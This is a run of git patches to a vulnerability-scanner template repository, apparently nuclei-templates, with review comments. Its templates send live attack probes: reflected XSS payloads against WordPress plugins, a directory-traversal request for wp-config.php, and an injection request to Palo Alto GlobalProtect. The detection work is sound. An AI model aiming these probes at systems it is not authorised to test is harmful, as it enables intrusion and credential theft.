@@ -0,0 +1,29 @@ +id: CVE-2016-1000134 + +info: + name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via playlist.php + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 3fee8f6145b45ca01f52f9dcd0408f259e6a5898 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 01:09:08 +0700 Subject: [PATCH 091/132] Create CVE-2016-1000135.yaml --- cves/2016/CVE-2016-1000135.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000135.yaml diff --git a/cves/2016/CVE-2016-1000135.yaml b/cves/2016/CVE-2016-1000135.yaml new file mode 100644 index 0000000000..f7703f0121 --- /dev/null +++ b/cves/2016/CVE-2016-1000135.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000135 + +info: + name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via mychannel.php + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 048cdff2257fb687bc32bb1f950dbe3c9793ba69 Mon Sep 17 00:00:00 2001 
From: sandeep Date: Sat, 17 Jul 2021 02:07:26 +0530 Subject: [PATCH 092/132] Additional matcher --- cves/2020/CVE-2020-12054.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2020/CVE-2020-12054.yaml b/cves/2020/CVE-2020-12054.yaml index e937c8a86e..11b19bcd64 100644 --- a/cves/2020/CVE-2020-12054.yaml +++ b/cves/2020/CVE-2020-12054.yaml @@ -18,7 +18,9 @@ requests: - type: word words: - "" + - "catch-breadcrumb" part: body + condition: and - type: word part: header From dd16d1349a05e4508c5192d7098b9d4eeedfe778 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 17 Jul 2021 10:02:09 +0530 Subject: [PATCH 093/132] Update CVE-2009-1558.yaml --- cves/2009/CVE-2009-1558.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2009/CVE-2009-1558.yaml b/cves/2009/CVE-2009-1558.yaml index f5f348890c..f56848b401 100644 --- a/cves/2009/CVE-2009-1558.yaml +++ b/cves/2009/CVE-2009-1558.yaml @@ -4,6 +4,7 @@ info: name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal author: daffainfo severity: high + description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter. reference: https://www.exploit-db.com/exploits/32954 tags: cve,cve2009,iot,lfi From 468cc383f416f2b2d0bbedd35e036183d48b5f16 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 04:35:07 +0000 Subject: [PATCH 094/132] Auto Update README [Sat Jul 17 04:35:07 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7ee95f4c1c..4506f054c5 100644 --- a/README.md +++ b/README.md 
@@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 450 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 452 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1576 files**. +**128 directories, 1578 files**. From 146085a0b8f1937a7927f91cdab9257e16a36ecc Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 17 Jul 2021 10:05:56 +0530 Subject: [PATCH 095/132] Update CVE-2016-1000129.yaml --- cves/2016/CVE-2016-1000129.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2016/CVE-2016-1000129.yaml b/cves/2016/CVE-2016-1000129.yaml index 72991376fc..d76c910dcf 100644 --- a/cves/2016/CVE-2016-1000129.yaml +++ b/cves/2016/CVE-2016-1000129.yaml @@ -4,6 +4,7 @@ info: name: defa-online-image-protector <= 3.3 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129 tags: cve,cve2016,wordpress,xss,wp-plugin From f503adee9754fabc0b256233577b06fd5694961d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 17 Jul 2021 10:07:03 +0530 Subject: [PATCH 096/132] Update CVE-2016-1000130.yaml --- cves/2016/CVE-2016-1000130.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2016/CVE-2016-1000130.yaml b/cves/2016/CVE-2016-1000130.yaml index f3fcc33305..36392e35d4 100644 --- a/cves/2016/CVE-2016-1000130.yaml +++ b/cves/2016/CVE-2016-1000130.yaml 
@@ -4,6 +4,7 @@ info: name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via date_select.php author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin e-search v1.0 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000130 tags: cve,cve2016,wordpress,xss,wp-plugin From 993317658932cde23a71aca4a0a66b151ba81c31 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 04:37:31 +0000 Subject: [PATCH 097/132] Auto Update README [Sat Jul 17 04:37:31 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 4506f054c5..8c3a31b76f 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 452 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 453 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1578 files**. +**128 directories, 1579 files**. From ccff761a30eacffb38821b0a37a5fdc0bcde0bfe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 04:38:54 +0000 Subject: [PATCH 098/132] Auto Update README [Sat Jul 17 04:38:54 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 8c3a31b76f..97b2c25465 100644 --- a/README.md +++ b/README.md 
@@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 453 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 454 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1579 files**. +**128 directories, 1580 files**. From 9e13ac967e526044e116a57e6c229ff73886f7e8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 04:40:28 +0000 Subject: [PATCH 099/132] Auto Update README [Sat Jul 17 04:40:28 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 97b2c25465..b74d85e047 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 454 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 455 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1580 files**. +**128 directories, 1581 files**. From 2e1222e8657e7a937ed30a386c2a0da6fe385225 Mon Sep 17 00:00:00 2001 
From: Prince Chaddha Date: Sat, 17 Jul 2021 10:10:50 +0530 Subject: [PATCH 100/132] Update CVE-2016-1000132.yaml --- cves/2016/CVE-2016-1000132.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2016/CVE-2016-1000132.yaml b/cves/2016/CVE-2016-1000132.yaml index af30f2ca54..e72ea63c7b 100644 --- a/cves/2016/CVE-2016-1000132.yaml +++ b/cves/2016/CVE-2016-1000132.yaml @@ -4,6 +4,7 @@ info: name: enhanced-tooltipglossary v3.2.8 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000132 tags: cve,cve2016,wordpress,xss,wp-plugin From 2a272f810c26ca5bc3905aa79eb289de3bed023c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 04:45:51 +0000 Subject: [PATCH 101/132] Auto Update README [Sat Jul 17 04:45:51 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b74d85e047..bcf6565570 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 455 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 456 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1581 files**. +**128 directories, 1582 files**. From 0996d4cf5f31313b95a1c5bf8f493d28f90c537f Mon Sep 17 00:00:00 2001 
From: Prince Chaddha Date: Sat, 17 Jul 2021 10:16:20 +0530 Subject: [PATCH 102/132] Update CVE-2016-1000133.yaml --- cves/2016/CVE-2016-1000133.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2016/CVE-2016-1000133.yaml b/cves/2016/CVE-2016-1000133.yaml index 9a682352a7..658b8562e7 100644 --- a/cves/2016/CVE-2016-1000133.yaml +++ b/cves/2016/CVE-2016-1000133.yaml @@ -4,6 +4,7 @@ info: name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 tags: cve,cve2016,wordpress,xss,wp-plugin From 6a45c29d460fc52241f766b64835634ce5196206 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 17 Jul 2021 10:18:09 +0530 Subject: [PATCH 103/132] Update CVE-2016-1000134.yaml --- cves/2016/CVE-2016-1000134.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2016/CVE-2016-1000134.yaml b/cves/2016/CVE-2016-1000134.yaml index 0a7af624f3..1f35214f3d 100644 --- a/cves/2016/CVE-2016-1000134.yaml +++ b/cves/2016/CVE-2016-1000134.yaml @@ -4,6 +4,7 @@ info: name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via playlist.php author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin hdw-tube v1.2 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 tags: cve,cve2016,wordpress,xss,wp-plugin From 72cc2adedc84375de2868c6b0972e8241cef5960 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 04:48:40 +0000 Subject: [PATCH 104/132] Auto Update README [Sat Jul 17 04:48:40 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index bcf6565570..8f529b5222 100644 --- a/README.md +++ b/README.md 
@@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 456 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 457 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1582 files**. +**128 directories, 1583 files**. From 7d5e27f3d7d6eec02e0712ebef049e62d12eeab7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 17 Jul 2021 10:19:09 +0530 Subject: [PATCH 105/132] Update CVE-2016-1000135.yaml --- cves/2016/CVE-2016-1000135.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2016/CVE-2016-1000135.yaml b/cves/2016/CVE-2016-1000135.yaml index f7703f0121..ba16e3c957 100644 --- a/cves/2016/CVE-2016-1000135.yaml +++ b/cves/2016/CVE-2016-1000135.yaml @@ -4,6 +4,7 @@ info: name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via mychannel.php author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin hdw-tube v1.2 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135 tags: cve,cve2016,wordpress,xss,wp-plugin From a8d8444747e8d0a53f7da620dfc621e9f53fa03f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 04:49:37 +0000 Subject: [PATCH 106/132] Auto Update README [Sat Jul 17 04:49:37 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 8f529b5222..b6c6064f64 100644 --- a/README.md +++ b/README.md 
@@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 457 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 458 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1583 files**. +**128 directories, 1584 files**. From 64851da36d536f797c196e25edf8d66af53a60f9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 04:51:13 +0000 Subject: [PATCH 107/132] Auto Update README [Sat Jul 17 04:51:13 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b6c6064f64..0e1cd9e088 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 458 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 459 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1584 files**. +**128 directories, 1585 files**. From 01adebd94c00e8f2caa5c5a29f25970eb88a4c13 Mon Sep 17 00:00:00 2001 
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sat, 17 Jul 2021 19:38:12 +0900 Subject: [PATCH 108/132] Create wp-plugin-memphis-documents-library-lfi.yaml --- wp-plugin-memphis-documents-library-lfi.yaml | 27 ++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 wp-plugin-memphis-documents-library-lfi.yaml diff --git a/wp-plugin-memphis-documents-library-lfi.yaml b/wp-plugin-memphis-documents-library-lfi.yaml new file mode 100644 index 0000000000..a5a571178e --- /dev/null +++ b/wp-plugin-memphis-documents-library-lfi.yaml @@ -0,0 +1,27 @@ +id: wp-plugin-memphis-documents-library-lfi + +info: + name: WordPress Plugin Memphis Document Library 3.1.5 LFI + severity: high + tags: wordpress,wp-plugin,lfi,rfd + description: arbitrary file download in Memphis Document Library 3.1.5 + reference: https://www.exploit-db.com/exploits/39593 + +requests: + - method: GET + path: + - '{{BaseURL}}/mdocs-posts/?mdocs-img-preview=../../../wp-config.php' + - '{{BaseURL}}/?mdocs-img-preview=../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 From 1da88455ecd042fece7b66f62d2d5eb74ea4c0bf Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sat, 17 Jul 2021 19:47:45 +0900 Subject: [PATCH 109/132] Update wp-plugin-memphis-documents-library-lfi.yaml --- wp-plugin-memphis-documents-library-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/wp-plugin-memphis-documents-library-lfi.yaml b/wp-plugin-memphis-documents-library-lfi.yaml index a5a571178e..9529fce228 100644 --- a/wp-plugin-memphis-documents-library-lfi.yaml +++ b/wp-plugin-memphis-documents-library-lfi.yaml 
@@ -2,6 +2,7 @@ id: wp-plugin-memphis-documents-library-lfi info: name: WordPress Plugin Memphis Document Library 3.1.5 LFI + author: 0x_Akoko severity: high tags: wordpress,wp-plugin,lfi,rfd description: arbitrary file download in Memphis Document Library 3.1.5 From fc38b27176c18869421f8df8099c317b1b68b6ce Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 16:32:15 +0530 Subject: [PATCH 110/132] minor update --- .../wordpress/wp-memphis-documents-library-lfi.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) rename wp-plugin-memphis-documents-library-lfi.yaml => vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml (64%) diff --git a/wp-plugin-memphis-documents-library-lfi.yaml b/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml similarity index 64% rename from wp-plugin-memphis-documents-library-lfi.yaml rename to vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml index 9529fce228..4091668e07 100644 --- a/wp-plugin-memphis-documents-library-lfi.yaml +++ b/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml @@ -1,12 +1,14 @@ -id: wp-plugin-memphis-documents-library-lfi +id: wp-memphis-documents-library-lfi info: name: WordPress Plugin Memphis Document Library 3.1.5 LFI author: 0x_Akoko severity: high - tags: wordpress,wp-plugin,lfi,rfd - description: arbitrary file download in Memphis Document Library 3.1.5 - reference: https://www.exploit-db.com/exploits/39593 + tags: wordpress,wp-plugin,lfi + description: Arbitrary file download in Memphis Document Library 3.1.5 + reference: | + - https://www.exploit-db.com/exploits/39593 + - https://wpscan.com/vulnerability/53999c06-05ca-44f1-b713-1e4d6b4a3f9f requests: - method: GET From a526e5dad96952ad89e9c0c3236ef0b107f9c31e Mon Sep 17 00:00:00 2001 
From: GitHub Action Date: Sat, 17 Jul 2021 11:22:26 +0000 Subject: [PATCH 111/132] Auto Update README [Sat Jul 17 11:22:26 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 0e1cd9e088..6d6ebd7b7f 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 459 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 459 | vulnerabilities | 236 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1585 files**. +**128 directories, 1586 files**. From 450c6b36900818a2c17da00cdcd53c20883f9fe3 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 17:07:28 +0530 Subject: [PATCH 112/132] Updated POC for CVE-2017-15944 --- cves/2017/CVE-2017-15944.yaml | 22 +++++++++++++--------- 1 file changed, 13 insertions(+), 9 deletions(-) diff --git a/cves/2017/CVE-2017-15944.yaml b/cves/2017/CVE-2017-15944.yaml index 45e7bfda4b..2d6bd7fbd0 100644 --- a/cves/2017/CVE-2017-15944.yaml +++ b/cves/2017/CVE-2017-15944.yaml 
@@ -2,23 +2,27 @@ id: CVE-2017-15944 info: name: PreAuth RCE on Palo Alto GlobalProtect - author: emadshanab - reference: http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html + author: emadshanab,milo2012 + reference: | + - https://www.exploit-db.com/exploits/43342 + - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html severity: high - tags: cve,cve2017,rce,vpn,paloalto + tags: cve,cve2017,rce,vpn,paloalto,globalprotect requests: - - method: GET - path: - - "{{BaseURL}}/global-protect/portal/css/login.css" + - raw: + - | + GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1 + Host: {{Hostname}} + Cookie: PHPSESSID={{randstr}}; matchers-condition: and matchers: - type: word words: - - "Last-Modified: Sun, 10 Sep 2017 16:48:23 GMT" - part: header + - "@start@Success@end@" + part: body - type: status status: - - 200 + - 200 \ No newline at end of file From 088a0bd7df1c063b62f1849c67c2fb33f7e8acdb Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 18:05:27 +0530 Subject: [PATCH 113/132] Updated matchers --- default-logins/aem/adobe-aem-default-credentials.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/default-logins/aem/adobe-aem-default-credentials.yaml b/default-logins/aem/adobe-aem-default-credentials.yaml index b6aacc7e67..254903e532 100644 --- a/default-logins/aem/adobe-aem-default-credentials.yaml +++ b/default-logins/aem/adobe-aem-default-credentials.yaml @@ -57,9 +57,11 @@ requests: matchers: - type: status status: - - 302 + - 200 - type: word part: header words: - - crx + - login-token + - crx.default + condition: and From 2bd83ae640ce416901b7e259e9b66429aced53e1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 12:41:33 +0000 Subject: [PATCH 114/132] Auto Update README [Sat Jul 17 12:41:32 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
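Review bot: `severity: high` is kept while the unchanged `name:` line calls this a PreAuth RCE and the request now actively sends the injection string instead of fingerprinting `login.css`'s `Last-Modified` header; `critical` would be consistent with the name, and the template should gain a `description:` stating that the check is an active request rather than a version probe and that `@start@Success@end@` in the body is the server-side confirmation, so operators can decide whether to run it. The new `reference: |` block stores both links as one literal string with embedded dashes; if the loader accepts a list for `reference`, a plain YAML sequence keeps each URL a separate value (the same block-scalar form is used in the memphis-documents, aem-detection and CVE-2013-3827 changes). The last line also drops the file's trailing newline (`\ No newline at end of file`).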
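Review bot: The status matcher changes from `302` to `200` with nothing recording why; a 200 is also what a rendered login page returns, so — assuming the `matchers-condition: and` that precedes `matchers:` is still in place above the hunk — the `login-token`/`crx.default` header pair is the only evidence of a successful login and that reasoning belongs in the file, e.g. `# j_validate=true answers 200 on success; the login-token cookie is the real signal` (presumably; confirm against a live instance). `condition: and` applies to the word list only, so both header strings must be present in the same response; if the cookie name or workspace value differs between AEM versions this will under-report rather than false-positive, which is the right direction for a credential check.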
diff --git a/README.md b/README.md index 6d6ebd7b7f..632ff9adf9 100644 --- a/README.md +++ b/README.md @@ -41,10 +41,10 @@ An overview of the nuclei template directory including number of templates assoc | cves | 459 | vulnerabilities | 236 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | -| default-logins | 37 | file | 42 | dns | 10 | +| default-logins | 38 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1586 files**. +**129 directories, 1587 files**. From 82c4e8762a3bd023cd9b43b6ef1ad8322432448e Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 17 Jul 2021 18:23:05 +0530 Subject: [PATCH 115/132] Added aem-detection Reference - https://github.com/shifa123/detections --- technologies/aem-detection.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 technologies/aem-detection.yaml diff --git a/technologies/aem-detection.yaml b/technologies/aem-detection.yaml new file mode 100644 index 0000000000..85399c2790 --- /dev/null +++ b/technologies/aem-detection.yaml @@ -0,0 +1,26 @@ +id: aem-detection + +info: + name: Favicon based AEM Detection + severity: info + author: shifacyclewala,hackergautam + tags: aem,favicon,tech + reference: | + - https://twitter.com/brsn76945860/status/1171233054951501824 + - https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a + - https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139 + - https://github.com/devanshbatham/FavFreak + - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv + +requests: + - method: GET + path: + - "{{BaseURL}}/libs/granite/core/content/login/favicon.ico" + + redirects: true + max-redirects: 2 + + matchers: + - type: dsl + dsl: + - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))" 
From 99a6f78dd1c7c28f691e5ed68e23eca9754ca9b9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 18:31:38 +0530 Subject: [PATCH 116/132] Updated AEM workflow --- workflows/aem-workflow.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/workflows/aem-workflow.yaml b/workflows/aem-workflow.yaml index c0f15c89d2..ff8f7019c7 100644 --- a/workflows/aem-workflow.yaml +++ b/workflows/aem-workflow.yaml @@ -7,4 +7,6 @@ info: tags: workflow workflows: - - template: misconfiguration/aem/ \ No newline at end of file + - template: technologies/aem-detection.yaml + subtemplates: + - tags: aem \ No newline at end of file From 1431a9611ca8d30d3492e85467d9160138f06309 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 13:05:20 +0000 Subject: [PATCH 117/132] Auto Update README [Sat Jul 17 13:05:20 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 632ff9adf9..90de9948ae 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 459 | vulnerabilities | 236 | exposed-panels | 200 | -| takeovers | 70 | exposures | 116 | technologies | 123 | +| takeovers | 70 | exposures | 116 | technologies | 124 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 38 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**129 directories, 1587 files**. +**129 directories, 1588 files**. From 41436ccef8798a055b862a37453cccc8a93dfabe Mon Sep 17 00:00:00 2001 
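Review bot: The workflow now gates every `aem`-tagged template, including the default-credentials login, on `technologies/aem-detection.yaml`, whose only matcher is a favicon hash of `/libs/granite/core/content/login/favicon.ico`; instances with a customised or missing favicon will no longer be scanned at all, whereas the replaced `misconfiguration/aem/` entry ran unconditionally. Consider a second, non-favicon detection as a sibling `- template:` entry, or at least note the coverage gap in the workflow's `info.description` (outside this hunk). The file also still ends without a trailing newline.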
